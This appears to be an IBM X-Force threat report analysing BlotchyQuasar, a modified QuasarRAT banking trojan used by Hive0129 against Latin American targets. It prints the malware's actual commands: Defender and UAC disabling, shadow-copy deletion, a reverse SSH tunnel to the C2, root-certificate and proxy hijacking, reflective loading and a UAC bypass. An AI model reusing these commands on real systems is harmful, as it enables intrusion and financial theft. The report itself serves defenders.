In late April through May 2023, IBM Security X-Force found several phishing emails leading to packed executable files delivering malware we have named BlotchyQuasar, likely developed by a group X-Force tracks as Hive0129. BlotchyQuasar is hardcoded to collect credentials from multiple Latin American-based banking applications and websites used within public and private environments. Similar operations conducted in late 2022 have also been noted delivering an earlier variant of this modified QuasarRAT by likely Spanish-speaking actors.
BlotchyQuasar, which X-Force describes as a banking trojan due to it containing a hardcoded list of banking applications, was developed on top of the QuasarRAT codebase, and is under active development and supports a wide range of different custom commands. Some of the most interesting features include the installation of root certificates and proxy auto-config URLs, which may be used in conjunction with Google Chrome Kiosk mode to impersonate financial institutions.
BlotchyQuasar has various commands to install specific third-party tools such as PuTTY, RDP, Chrome/Opera Portable, AnyDesk, TightVNC, hidden-VNC, NGINX server, Node.js server, Remote Utilities, WinPwnage, and credential stealers. The third-party tools are common post-exploitation tools used to enable human-operated attacks, along with enabling remote desktop protocols (RDP), and Server Message Block (SMB) tunneling.
Hive0129
Hive0129, tracked by X-Force since 2019, likely originates from South America with operations focused on targeting government and private entities, likely for financial data, business intelligence, and intellectual property information across Colombia, Ecuador, Chile, and Spain. Phishing emails are used to deliver commodity remote access trojans (RATs), such as Proyecto RAT, BitRAT, QuasarRAT, and most recently BlotchyQuasar. Phishing emails are designed to appear to be from Latin American government agencies and contain malicious attachments or links.
Analysis
Delivery
X-Force detected an email phishing campaign from late April to late May 2023 impersonating government agencies in Latin America that are well written and claim to inform the recipient on their tax status (see screenshots below). The recipients are instructed to click on a link within the email, which directs them to the document described. The URL, which is contained within the email as well as an attached PDF, has been geofenced using links generated with the Geo Targetly service.
If the URL https[:]//gtly[.]to/gy3ga460X is requested from an IP address within a specific Latin American country, an LZIP compressed and encrypted archive is downloaded (.LHA file). If not, the URL redirects the user to an official government website and subsequently stops the infection process.
The archive file can be decrypted via the password contained within the email and the PDF, which reveals a .NET executable, which in this case is identified as a RoboSki loader.
RoboSki is just one of the many different commodity .NET loaders and their variants, which have been found in infection-chains leading to the BlotchyQuasar RAT. However, these loaders are not just used by Hive0129, but are also common among low-profile threat actors deploying various kinds of RATs and stealers such as AgentTesla, FormBook or Lokibot, via phishing emails. Since attribution cannot be assessed based on open-source and commodity loaders alone, if the infection chain leads to the final payload BlotchyQuasar, it is more than likely associated with a Hive0129 campaign.
BlotchyQuasar — Hive0129’s banking trojan
Although simple detection engines will easily identify the final payload as plain QuasarRAT, it has actually been heavily modified to support a wide range of additional features and commands, effectively making it a banking trojan. Comparing the paths of the PDB (Program database) files, automatically created during compilation, shows that the modification of the QuasarRAT source code has been an ongoing project since at least early 2020. Since then, the developers have added numerous features, thereby creating a large number of different variants. Internally, the developers refer to the banking trojan project as NUCLEAR RAT.
The latest variant, observed in the campaign detailed above is “Version 5 – 9058,” where 9058 resembles the port used for C2 communication.
Initialization
For the files in this campaign, upon execution, BlotchyQuasar begins by resolving its main C2 server, and decrypts a hardcoded base64 string to reveal a Pastebin URL. After downloading the text from Pastebin, it parses and decrypts it to retrieve the final C2 server:
ecuadorlab[.]work.gd:9058 |
The RAT also sets the client name to “NEW – <current_date_and_time>”, which will show up on the QuasarRAT C2 panel. To make sure it is only running as a single instance, a hardcoded mutex is created:
44474877AKs8XXT4SylAo2kAlUS2kYkala! |
Next, the trojan attempts to determine the victim’s geolocation, by sending an HTTP request to:
http://ip-api[.]com/json/ |
If this is unsuccessful, it will fallback to:
http://freegeoip[.]net/xml/ |
If that fails to retrieve an IP as well, it will try to retrieve the public IP address through:
http://api.ipify[.]org/ |
Lastly, before installation, it will delete the Zone Identifier ADS (mark-of-the-web) from its original executable and set a list of internal configuration variables, including the install path and AES decryption keys for secure C2 communication.
Persistence and evasion
BlotchyQuasar creates a new scheduled task running every 3 minutes with the following command line:
schtasks /create /tn “<hardcoded_startup_name>” /SC MINUTE /MO 3 /RL HIGHEST /tr “<RAT_current_path>” |
Additionally, in order to persist after startup, the RAT’s current path is added to a registry key under:
HKCUSoftwareMicrosoftWindowsCurrentVersionRun<hardcoded_startup_name> |
If the instance is running with elevated privileges, BlotchyQuasar also deletes volume shadow copies from the system:
vssadmin delete shadows /all /quiet |
and will instead store the scheduled task in a hardcoded system folder and use the following registry keys:
HKLMSoftwareMicrosoftWindowsCurrentVersionRun<hardcoded_startup_name> HKLMSOFTWAREWow6432NodeMicrosoftWindowsCurrentVersionRun<hardcoded_startup_name> |
Depending on privilege and the configuration parameter “UNINSUADEFEN,” a list of anti-virus features are disabled on the system. These are done in multiple batches, some of which contain redundant modifications.
First batch:
Registry key (HKLM hive) |
New value |
SOFTWAREMicrosoftWindows DefenderFeaturesTamperProtection |
0 |
SOFTWAREPoliciesMicrosoftWindows DefenderDisableAntiSpyware |
1 |
SOFTWAREPoliciesMicrosoftWindows DefenderReal-Time ProtectionDisableRealtimeMonitoring |
1 |
SOFTWAREPoliciesMicrosoftWindows DefenderReal-Time ProtectionDisableBehaviorMonitoring |
1 |
SOFTWAREPoliciesMicrosoftWindows DefenderReal-Time ProtectionDisableOnAccessProtection |
1 |
SOFTWAREPoliciesMicrosoftWindows DefenderReal-Time ProtectionDisableScanOnRealtimeEnable |
1 |
SOFTWAREMicrosoftSecurity CenterUACDisableNotify |
1 |
SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystemEnableLUA |
0 |
SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystemConsentPromptBehaviorAdmin |
0 |
SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystemPromptOnSecureDesktop |
0 |
SOFTWAREMicrosoftWindows DefenderDisableAntiSpyware |
1 |
Via PowerShell:
powershell Get-MpPreference -verbose |
Depending on the output (if the AV options are enabled), the following commands are run:
Set-MpPreference -DisableRealtimeMonitoring $true Set-MpPreference -DisableBehaviorMonitoring $true Set-MpPreference -DisableBlockAtFirstSeen $true Set-MpPreference -DisableAntiSpyware $true Set-MpPreference -DisableIOAVProtection $true Set-MpPreference -DisablePrivacyMode $true Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true Set-MpPreference -DisableArchiveScanning $true Set-MpPreference -DisableIntrusionPreventionSystem $true Set-MpPreference -DisableScriptScanning $true Set-MpPreference -SubmitSamplesConsent 2 Set-MpPreference -HighThreatDefaultAction 6 -Force Set-MpPreference -ModerateThreatDefaultAction 6 Set-MpPreference -LowThreatDefaultAction 6 Set-MpPreference -SevereThreatDefaultAction 6 Set-MpPreference -ExclusionProcess <hardcoded_install_name> Set-MpPreference -ExclusionPath -ExclusionPath $ENV:APPDATA |
Second batch:
Registry key |
New value |
HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindows DefenderDisableAntiSpyware |
1 |
HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindows DefenderDisableRoutinelyTakingAction |
1 |
HKEY_CURRENT_USERSOFTWAREPoliciesMicrosoftWindows DefenderServiceKeepAlive |
0 |
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows DefenderServiceKeepAlive |
0 |
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionNotificationsSettingsWindows.Defender.SecurityCenterEnabled |
0 |
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionNotificationsSettingsWindows.Defender.SystemToast.SecurityAndMaintenanceEnabled |
0 |
HKEY_LOCAL_MACHINESystemControlSet001ServicesWinDefendStart |
4 |
HKEY_LOCAL_MACHINESystemControlSet002ServicesWinDefendStart |
4 |
HKEY_LOCAL_MACHINESystemCurrentControlSetServicesWinDefendStart |
4 |
HKEY_LOCAL_MACHINESystemControlSet001ServicesWdBootStart |
4 |
HKEY_LOCAL_MACHINESystemControlSet002ServicesWdBootStart |
4 |
HKEY_LOCAL_MACHINESystemCurrentControlSetServicesWdBootStart |
4 |
HKEY_LOCAL_MACHINESystemControlSet001ServicesWdFilterStart |
4 |
HKEY_LOCAL_MACHINESystemControlSet002ServicesWdFilterStart |
4 |
HKEY_LOCAL_MACHINESystemCurrentControlSetServicesWdFilterStart |
4 |
HKEY_LOCAL_MACHINESystemControlSet001ServicesWdNisDrvStart |
4 |
HKEY_LOCAL_MACHINESystemControlSet002ServicesWdNisDrvStart |
4 |
HKEY_LOCAL_MACHINESystemCurrentControlSetServicesWdNisDrvStart |
4 |
HKEY_LOCAL_MACHINESystemControlSet001ServicesWdNisSvcStart |
4 |
HKEY_LOCAL_MACHINESystemControlSet002ServicesWdNisSvcStart |
4 |
HKEY_LOCAL_MACHINESystemCurrentControlSetServicesWdNisSvcStart |
4 |
HKEY_CURRENT_USERSOFTWAREPoliciesMicrosoftWindows DefenderSignature UpdatesForceUpdateFromMU |
0 |
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows DefenderSignature UpdatesForceUpdateFromMU |
0 |
HKEY_CURRENT_USERSOFTWAREPoliciesMicrosoftWindows DefenderSignature UpdatesUpdateOnstartup |
0 |
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows DefenderSignature UpdatesUpdateOnStartup |
0 |
HKEY_CURRENT_USERSOFTWAREPoliciesMicrosoftWindows DefenderReal-Time ProtectionDisableRealTimeMonitoring |
1 |
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows DefenderReal-Time ProtectionDisableRealTimeMonitoring |
1 |
HKEY_CURRENT_USERSYSTEMCurrentControlSetServicesSecurityHealthService |
4 |
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecurityHealthService |
4 |
HKEY_CURRENT_USERSYSTEMCurrentControlSetServicesWdNisSvc |
3 |
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWdNisSvc |
3 |
HKEY_CURRENT_USERSYSTEMCurrentControlSetServicesWinDefend |
3 |
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWinDefend |
3 |
Command and control
Before connecting to its C2 server, BlotchyQuasar will verify the successful installation and initialize the QuasarRAT keylogger if this has been specified in the configuration. The RAT has been designed to establish an encrypted session with its C2 server to receive various commands. QuasarRAT has countless built-in commands, but since the code is open-source, this analysis will only focus on commands which have been added at a later stage.
Bank app reconnaissance
BlotchyQuasar’s most important feature is the detection of specific online banking applications and reporting those to the C2 server. It does not wait for C2 commands but starts directly after initialization and runs in 5-second intervals. The trojan begins by grabbing the title of whichever window is currently in the foreground. This string is then compared against a series of hardcoded titles of common banking applications used in Latin America and added to the victim information shown on the C2 panel. Since it uses the title of the window, both browser windows with banking websites as well as specific desktop applications may be targeted.
Among the list are some of the most popular banks in Latin America, specifically Colombia, Ecuador, and Bolivia. The titles also show the trojan targeting both personal and enterprise applications used for financial transactions.
C2 commands
An overview of the full list of custom C2 commands can be found in the table below, with the detailed analysis reported further down.
C2 command name |
C2 command arguments |
Client behavior |
File system artifacts |
Registry artifacts |
Backdo |
C2_hostname, URL_exe, URL_ppk |
Downloads two files and likely creates a reverse SSH tunnel listening at 10:10 and 15:10 |
C:WindowsSystem32svchosts.exe C:WindowsSystem32t1.ppk |
|
BackDoUni |
|
Uninstalls the backdoor |
|
|
LogonW7 |
URL_dll |
Downloads and runs a file FLogonW7.dll, likely a fake login page to steal user credentials |
<RAT_StartupPath>FLogonW7.dll %LOCALAPPDATA%Microsoftuser.db |
HKCUSoftwareMicrosoftWindowsCurrentVersionThemesKEY |
InstallRPD |
URL_exe, argument |
Likely installs RDP tool and runs the provided command |
<RAT_StartupPath>RDP.exe |
HKCUSoftwareMicrosoftWindowsCurrentVersionThemesRDP |
UpdateRPD |
URL_txt |
Updates RDP version |
<RAT_StartupPath>Update.txt C:Program FilesRDP Wrapperrdpwrap.ini |
|
AP |
URL_cer, chrome_arg, action |
Adds an external root certificate to the enterprise store and replaces Google Chrome shortcuts with Google Chrome Portable |
<RAT_StartupPath>Fot.cer %USERPROFILE%DesktopGoogle Chrome.lnk %APPDATA%MicrosoftInternet ExplorerQuick LaunchUser PinnedTaskBarGoogle Chrome.lnk %APPDATA%MicrosoftInternet ExplorerQuick LaunchGoogle Chrome.lnk %APPDATA%MicrosoftInternet ExplorerQuick LaunchUser PinnedImplicitAppShortcuts*Google Chrome.lnk C:ProgramDataMicrosoftWindowsStart MenuProgramsGoogle Chrome.lnk %APPDATA%MicrosoftInternet ExplorerQuick LaunchUser PinnedStartMenuGoogle Chrome.lnk C:UsersPublicDesktopGoogle Chrome.lnk |
|
BS |
action |
Calls SwitchDesktop() API with a new desktop handle. Returns message: “Blank screen started” |
|
|
ActivarProyecto |
URL_cert, URL_PAC |
Allows the attacker to use a remote proxy auto-config file from the supplied URL. Together with the installation of the root certificate, this may be used to impersonate trusted websites by specifying an attacker-controlled server as a proxy. |
<RAT_StartupPath>Fot.cer |
HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsAutoDetect HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsAutoConfigURL |
DesactivarProyecto |
|
Deletes the proxy auto-config URL from the registry. |
|
HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsAutoConfigURL |
AnyD |
URL_exe |
Likely installs the AnyDesk remote desktop application. |
%APPDATA%MicrosoftSystemCertificatesAnyDesk.exe C:WindowsSystem32configsystemprofileAppDataRoamingAnyDeskservice.conf C:WindowsSystem32configsystemprofileAppDataRoamingAnyDesksystem.conf C:WindowsSystem32configsystemprofileAppDataRoamingAnyDeskuser.conf |
HKCUSoftwareMicrosoftWindowsCurrentVersionThemesAID |
system |
|
Moves itself to the System file directory and create a new scheduled task running with SYSTEM privileges. |
C.WindowsSystem32<hardcoded_folder_name><hardcoded_install_name> |
|
dllR |
URL_txt |
Downloads a .NET payload as Base64, which is stored in the registry. The payload is then reflectively injected using PowerShell. A scheduled task called “MicrosoftUpdate” executes the payload on every logon event. |
<RAT_StartupPath>RevenRa.txt |
HKCUSoftwareMicrosoftMozillaPluginsData |
Logon |
Name, URL_dll |
Runs a .NET DLL (either already stored in registry, or else ad-hoc downloaded). Likely an improved version of the “LogonW7” command |
<RAT_StartupPath><Name>.dll %LOCALAPPDATA%Microsoftuser.db |
HKCUSoftwareMicrosoftMozillaPlugins<Name> HKCUSoftwareMicrosoftWindowsCurrentVersionThemesKEY |
Pytho |
URL_exe |
Likely installs Python at C:py |
%TMP%py.exe C:py |
HKCUSoftwareClassesApplicationspython.exeshellopencommand HKCUSoftwareClassesLocal SettingsSoftwareMicrosoftWindowsShellMuiCache |
HtmlVN_C |
URL_install, URL_kiosk, action |
Installs the TightVNC software. If run, this command also starts a local NGINX and a local Node.js server. It will then open the kiosk-URL with Google Chrome running in Kiosk mode, locking the user into the full-screen browser window |
<RAT_StartupPath>htmlvn_c.exe %APPDTA%DobleV |
|
scanner |
|
Runs three instances of main.py, which is likely a copy of WinPwnge, a Python script implementing various techniques of UAC bypass, persistence and privilege escalation. |
C:pypython.exe C:pymain.py |
|
ChromeP |
URL_exe, URL_cer |
Likely installs Chrome Portable, installs a root certificate and copies existing user data over to the Chrome Portable installation directory. |
<RAT_StartupPath>Chrome.exe <RAT_StartupPath>Fot.cer %APPDATA%ChromeDataprofileDefault |
|
OperaP |
URL_exe, URL_cer |
Likely installs Opera Portable, installs a root certificate and copies existing user data over to the Opera Portable installation directory. |
<RAT_StartupPath>Opera.exe <RAT_StartupPath>Fot.cer %APPDATA%OperaAppOperaprofiledata |
|
Usoris |
URL_exe |
Installs the Remote Utilities software and creates a scheduled task to run it every 3 minutes. |
%APPDATA%UsorisUsoris.exe |
HKCUSoftwareMicrosoftWindowsCurrentVersionThemesUID |
BY_UA_C |
|
Attempts a UAC Bypass using computerdefaults.exe |
|
HKCUSoftwareClassesms-settingsshellopencommand HKCUSoftwareClassesms-settingsshellopencommandDelegateExecute |
Hvn_c |
URL_exe, argument |
Likely installs a hVNC tool (hidden-VNC) |
<RAT_StartupPath>NServises.exe |
|
CerrarProceso |
process_name |
Kills all processes with the specified name. |
|
|
metodo |
ID |
Likely runs a copy of WinPwnge, attempting to elevate privileges via a specific UAC bypass technique selected via the ID |
|
|
Disadef |
|
Runs the same functions as during initialization, to disable Windows Defender and UAC via various commands and registry alterations. |
|
|
Rename |
Name |
Changes the client name e.g. how the victim is displayed on the C2 panel. |
|
|
Command: “Backdo” (C2_hostname, URL_exe, URL_ppk):
Firstly, two files are downloaded to
- C:WindowsSystem32svchosts.exe
- C:WindowsSystem32t1.ppk
Next, two scheduled tasks are created via the following commands:
schtasks /create /RU SYSTEM /tn MicrosoftWindowsDev64Files<hardcoded_startup_name> /SC DAILY /RI 5 /ST 10:10 /DU 00:10 /K /RL HIGHEST /TR “svchosts.exe t1@<C2_hostname> -P 443 -i t1.ppk -hostkey 5e:78:65:69:f9:9b:b0:a3:27:20:1a:76:d4:1c:f9:fa -2 -4 -T -C -R 33445:127.0.0.1:445 -R 33889:127.0.0.1:3389 -N -batch” /f schtasks /create /RU SYSTEM /tn MicrosoftWindowsTDev64FilesDHdis<hardcoded_startup_name> /SC DAILY /RI 5 /ST 15:10 /DU 00:10 /K /RL HIGHEST /TR “svchosts.exe t1@<C2_hostname> -P 443 -i t1.ppk -hostkey 5e:78:65:69:f9:9b:b0:a3:27:20:1a:76:d4:1c:f9:fa -2 -4 -T -C -R 33445:127.0.0.1:445 -R 33889:127.0.0.1:3389 -N -batch” /f |
Judging by the command options, the downloaded executable is likely a copy of the Windows PuTTY client, and t1.ppk a private key file to establish a trusted connection. In that case, the command creates two scheduled tasks to run daily at 10:10 and 15:10, every 5 minutes for a total of 10 minutes. Each task runs the same PuTTY command, using the downloaded private key, specifying a hostkey (and other options such as enabling compression, using SSH version 2 and IPv4) to finally open a reverse SSH tunnel, by forwarding remote ports 33445 and 33889 to 445 and 3389 respectively (SMB and RDP). Opening a reverse SSH tunnel allows the attackers to access the host directly via RDP and SMB, by tunneling those protocols through an SSH connection that is running on the HTTPs ports mentioned.
If successful, the command returns the message: “BackDoor installed successfully, listening time 10:10 and 15:10.”
Command: “BackdoUni” ():
This command simply uninstalls the SSH backdoor by deleting the scheduled tasks.
Command: “LogonW7” (URL_dll):
A file is downloaded from the URL to
- <RAT_StartupPath>FLogonW7.dll
The payload is a .NET DLL, and its function FLogonW7.Logon.Main() is run. After execution, the trojan will read a new file at %LOCALAPPDATA%Microsoftuser.db and parse out strings from lines containing the string “Correct”. Finally, the result is relayed back to the C2 server and written to the registry at:
HKCUSoftwareMicrosoftWindowsCurrentVersionThemesKEY |
The downloaded DLL is likely a fake login screen, prompting the user for credentials.
Command: “InstallRPD” (URL_exe, argument):
A file is downloaded from the URL to
- <RAT_StartupPath>RDP.exe
Next, RDP.exe is executed with the supplied argument. Depending on the success of the command, either “True” or “False” is written to the registry at:
HKCUSoftwareMicrosoftWindowsCurrentVersionThemesRDP |
The trojan is also capable of detecting unsupported versions, which it will send back to its C2 server. Example: “RDP function fully installed, but not supported with version: <RDP_version>, Update the .ini file”.
Command: “UpdateRPD” (URL_txt):
A file is downloaded from the URL to
- <RAT_StartupPath>Update.txt
If RDP is already installed, it will copy the downloaded file to
- C:Program FilesRDP Wrapperrdpwrap.ini
Finally, the RDP executable is ran with the -r option. On success, the following message is sent: “RDP Update .ini function sent completed.”
Command: “AP” (URL_cer, chrome_arg, action):
For action: “Activated AHEP”:
The command first verifies that the path
%APPDATA%Chromechrome.exe |
exits. If not it will return the message: “To execute this function you must first install Chrome Portable”
A file is downloaded from the URL to
- <RAT_StartupPath>Fot.cer
It runs the command
certutil -f -v -addstore -enterprise root “<RAT_StartupPath>Fot.cer” |
which will add the file as a root certificate to the enterprise store.
Next, the destination file of the following shortcuts is replaced with %APPDATA%Chromechrome.exe (Portable Chrome)
%USERPROFILE%DesktopGoogle Chrome.lnk %APPDATA%MicrosoftInternet ExplorerQuick LaunchUser PinnedTaskBarGoogle Chrome.lnk %APPDATA%MicrosoftInternet ExplorerQuick LaunchGoogle Chrome.lnk %APPDATA%MicrosoftInternet ExplorerQuick LaunchUser PinnedImplicitAppShortcuts*Google Chrome.lnk C:ProgramDataMicrosoftWindowsStart MenuProgramsGoogle Chrome.lnk %APPDATA%MicrosoftInternet ExplorerQuick LaunchUser PinnedStartMenuGoogle Chrome.lnk (If Windows 7 or Windows 8) |
and it will also delete the shortcut at
C:UsersPublicDesktopGoogle Chrome.lnk |
Upon success, it returns the message “Fake Created”.
For action: “Desactivated”:
All shortcuts are reset to their original destination at one of
%PROGRAMFILES%GoogleChromeApplicationchrome.exe %PROGRAMFILES(x86)%GoogleChromeApplicationchrome.exe |
The message returned is “Normal Created”.
Command: “BS” (action):
If the action is “Start”, this command will call the SwitchDesktop() API with a new desktop handle and returns the message: “Blank screen started”. If the action is anything else, it switches back to the old desktop handle.
Command: “ActivarProyecto” (URL_cert, URL_PAC):
Starts by setting two registry keys used to configure proxy auto-config:
HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsAutoDetect = 0 HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsAutoConfigURL = <URL_PAC> |
Proxy auto-config is a feature to specify which proxy to use for a specific URL. In this case, the URL may reference a remote proxy auto-config file (.pac), which could specify an attacker server to be used as a proxy when connecting to a banking website. However, in order for the browser to trust the malicious server, the attacker needs to install a matching root certificate on the victim’s machine. This is accomplished in the next step.
A file is downloaded from the URL to
- <RAT_StartupPath>Fot.cer
It runs the command
certutil -f -v -addstore -enterprise root “<RAT_StartupPath>Fot.cer” |
which will add the file as a root certificate to the enterprise store.
The following command is run for less than a second before killing all processes containing “iexplore”(Windows 7/8) or “msedge”:
C:Program FilesInternet Exploreriexplore.exe www.google.com |
Finally, the command returns “Project Activated successfully URL = <URL_PAC>”
Command: “DesactivarProyecto” ():
The registry value is deleted via
HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsAutoConfigURL = “” |
Again, Internet Explorer is launched for a split second. Lastly, the DNS cache is flushed as well with the command:
ipconfig /flushdns |
The return message is: “Project Desactivated successfully URL = <old_PAC_URL>”.
Command: “AnyD” (URL_exe):
A file is downloaded from the URL to
- %APPDATA%MicrosoftSystemCertificatesAnyDesk.exe
In addition, a new scheduled task is created via the command
schtasks /create /RU SYSTEM /tn MicrosoftWindowsSideShowDevFiles“DocSys” /SC DAILY /RI 10 /ST 09:10 /DU 00:20 /K /RL HIGHEST /TR “%APPDATA%MicrosoftSystemCertificatesAnyDesk.exe” /f |
The task is set to run daily at 09:10, every 10 minutes for a duration of 20 minutes.
After starting the task manually, a number of config files are modified: (note paths are different for x86)
C:WindowsSystem32configsystemprofileAppDataRoamingAnyDeskservice.conf:
ad.anynet.pwd_hash=ceeca0067355a44571dfe7f1d28932528ec2ddb20282d6b90eafd7a967a05e4a ad.anynet.pwd_salt=619799b94de1c347bd508b98cd502800 |
C:WindowsSystem32configsystemprofileAppDataRoamingAnyDesksystem.conf:
ad.security.hear_audio=false ad.security.control_input=false ad.security.uaccess.hear_audio=false ad.security.uaccess.control_input=false |
C:WindowsSystem32configsystemprofileAppDataRoamingAnyDeskuser.conf:
ad.ui.alias_or_id=true ad.privacy.image.show=0 ad.privacy.chat.path_cfg=0 ad.audio.playback_device=0.0.0.00000000.c5c59b2b-65eb-4a4b-b451-f73197d47034 ad.audio.transmit_mode=0 ad.audio.playback_mode=0 ad.audio.transmit_source=0.0.0.00000000.c5c59b2b-65eb-4a4b-b451-f73197d47034 ad.recording.incoming=false ad.recording.outgoing=false ad.print.mode=0 |
Finally, the AnyDesk ID is parsed from the config and written to the registry key:
HKCUSoftwareMicrosoftWindowsCurrentVersionThemesAID |
Command: “system” ():
The original trojan executable is copied to a new folder in the C:System32 directory. The new install directory is a hardcoded string in the config and differs between samples.
Lastly, a new scheduled task is created, running the copied executable with SYSTEM privileges every minute. Return message is: “Run as System Successfully.”
Command: “dllR” (URL_txt):
A file is downloaded from the URL to
- <RAT_StartupPath>RevenRa.txt
The text contents of the file is saved to the registry at
HKCUSoftwareMicrosoftMozillaPluginsData |
A PowerShell command Base64-decodes the payload and reflectively injects the .NET assembly:
[System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:SoftwareMicrosoftMozillaPlugins).Data)).EntryPoint.Invoke($Null,$Null) |
Finally, a scheduled task is created to execute the PowerShell command upon user logon and the original text file gets deleted.
Command: “Logon” (Name, URL_dll):
If a registry key exists at
HKCUSoftwareMicrosoftMozillaPlugins<Name> |
the payload is pulled from the registry and the .NET DLL’s function <Name>.Logon.Main is called.
If the registry key does not exist, the payload is first downloaded from the URL to
- <RAT_StartupPath><Name>.dll
before it is written to the registry and executed.
After execution, the trojan will again read a new file at %LOCALAPPDATA%Microsoftuser.db and parse out strings from lines containing the string “Correct”. Finally, the result is relayed back to the C2 server and written to the registry at:
HKCUSoftwareMicrosoftWindowsCurrentVersionThemesKEY |
This command is likely an improved version of the “LogonW7” command.
Command: “Pytho” (URL_exe):
A file is downloaded from the URL to
- %TMP%py.exe
A new directory is created at
- C:py
and py.exe is executed.
Next, C:py is added to the Path environment variable.
Lastly, the following registry keys are set:
HKCUSoftwareClassesApplicationspython.exeshellopencommand = “C:pypython.exe” “%1” HKCUSoftwareClassesLocal SettingsSoftwareMicrosoftWindowsShellMuiCache“C:pypython.exe.FriendlyAppName” = Python HKCUSoftwareClassesLocal SettingsSoftwareMicrosoftWindowsShellMuiCache“C:pypython.exe.ApplicationCompany” = Python Software Foundation |
The return message is: “Python was installed successfully”
Command: “HtmlVN_C” (URL_install, URL_kiosk, action):
For action: “Installvn”:
A file is downloaded from the installation URL to
- <RAT_StartupPath>htmlvn_c.exe
and executed. It is likely an installer for the TightVNC software.
The following commands change the client’s firewall to allow connections on ports 8080, 5900 and 80 and enable the installed TightVNC application to connect.
netsh advfirewall firewall add rule name=node dir=in action=allow protocol=tcp localport=8080 netsh advfirewall firewall add rule name=node dir=in action=allow protocol=tcp localport=5900 netsh advfirewall firewall add rule name=node dir=in action=allow protocol=tcp localport=80 netsh advfirewall firewall add rule name=vpn dir=in action=allow program=%APPDATA%DobleVTSPortabletightvnc-64bittvnserver.exe enable=yes |
The last command applies a registry file, which is part of the TightVNC installation:
regedit /s %APPDTA%DobleVTSPortabletightvnc-64bitTSPortable.reg |
Finally, it returns the message: “*Now Run TvnServer in the double…”.
For action: “StartVN”:
First, the command confirms that Chrome Portable and TightVNC are installed at:
- %APPDATA%Chromechrome.exe
- %APPDATA%DobleVTSPortabletightvnc-64bittvnserver.exe
It will then start tvnserver.exe.
Lastly, a temporary batch file is written and executed:
@echo off chcp 65001 echo DONT CLOSE THIS WINDOW! ping -n 10 localhost > nul CD %APPDATA%DobleVnginx start nginx.exe CD %APPDATA%DobleVnode start node.exe config.js start Chrome.exe –app=<URL_kiosko> –kiosk del /a /q /f “<temp_batch_file>” |
The script is designed to start a local Node.js server and a local NGINX server, which are both within the “DobleV” directory. After both servers are up, Google Chrome is started in kiosk mode with the attacker-specified kiosk-URL. This mode is often used in point-of-sale systems and locks the user into a specific full-screen browser window, without allowing access to any other windows.
For action: “StopVN”:
All processes with the following names are killed:
- chrome
- nginx
- node
Command: “scanner” ():
First, the trojan checks if a file exists at
- C:pypython.exe
Next, it runs three commands:
C:pypython.exe C:pymain.py -s uac C:pypython.exe C:pymain.py -s persist C:pypython.exe C:pymain.py -s elevate |
The file main.py is likely a version of the open-source WinPwnage project on GitHub:
It is a script attempting various techniques for UAC bypass, persistence and privilege escalation.
Command: “ChromeP” (URL_exe, URL_cer):
A file is downloaded from the URL to
- <RAT_StartupPath>Chrome.exe
and executed (likely a Chrome Portable installer).
The second file is downloaded from the URL to
- <RAT_StartupPath>Fot.cer
It runs the command:
certutil -f -v -addstore -enterprise root “<RAT_StartupPath>Fot.cer” |
which will add the file as a root certificate to the enterprise store.
The Chrome installer is deleted from <RAT_StartupPath>Chrome.exe and existing Chrome user data is copied to the Portable Chrome directory:
%LOCALAPPDATA%GoogleChromeUser DataDefault -> %APPDATA%ChromeDataprofileDefault |
Return message is: “Chrome Portable was installed successfully.”
Command: “OperaP” (URL_exe, URL_cer):
This command does essentially the same as the ChromeP command for the Opera browser.
Downloaded file path is:
- <RAT_StartupPath>Opera.exe
The user data is copied over as well:
%APPDATA%Opera SoftwareOpera Stable -> %APPDATA%OperaAppOperaprofiledata |
Return message is: “Opera Portable was installed successfully.”
Command: “Usoris” (URL_exe):
A file is downloaded from the URL to
- %APPDATA%UsorisUsoris.exe
and executed (likely an installer for the software Remote Utilities).
A new scheduled task is created to execute the Remote Utilities server executable every 3 minutes.
schtasks /create /RU SYSTEM /tn MicrosoftWindowsShowProvidersFilesWerSvct /SC MINUTE /MO 3 /RL HIGHEST /tr “%APPDATA%Usorisrutserv.exe” /f |
Next, a registry file %APPDATA%Usorisw10.reg ( or w7.reg if Windows 7/8) is applied.
The Remote Utilities user id is parsed from the logs at %APPDATA%Remote Utilities AgentLogsrut_log_<date>.html and written to the registry key:
HKCUSoftwareMicrosoftWindowsCurrentVersionThemesUID |
The command’s return message is: “Remote utilities host was installed successfully with ID: <UID>”
Command: “BY_UA_C” ():
First, the command checks if the malware is not already running with Administrator privileges and that it is running on Windows 10.
After closing its mutex, it will attempt a UAC bypass using the Windows binary computerdefaults.exe.
To achieve this, the following registry keys are set:
HKCUSoftwareClassesms-settingsshellopencommand<default_key> = <trojan_current_path> HKCUSoftwareClassesms-settingsshellopencommandDelegateExecute = 0 |
Finally, it runs the following command in order to create a new instance of itself running with elevated privileges:
cmd.exe /c start computerdefaults.exe |
Command: “Hvn_c” (URL_exe, argument):
A file is downloaded from the URL to
- <RAT_StartupPath>NServises.exe
and executed with the provided argument. The payload is likely a hVNC tool (hidden-VNC). Hidden-VNC tools may be used to directly control a remote computer in a hands-on manner, but without the victim in front of the machine noticing. It accomplishes this by creating a hidden Desktop, which is used by the attacker to control windows. This technique is popular among banking trojans, in order to make a transaction seem more legitimate since it is sent directly from the victim’s physical device and browser.
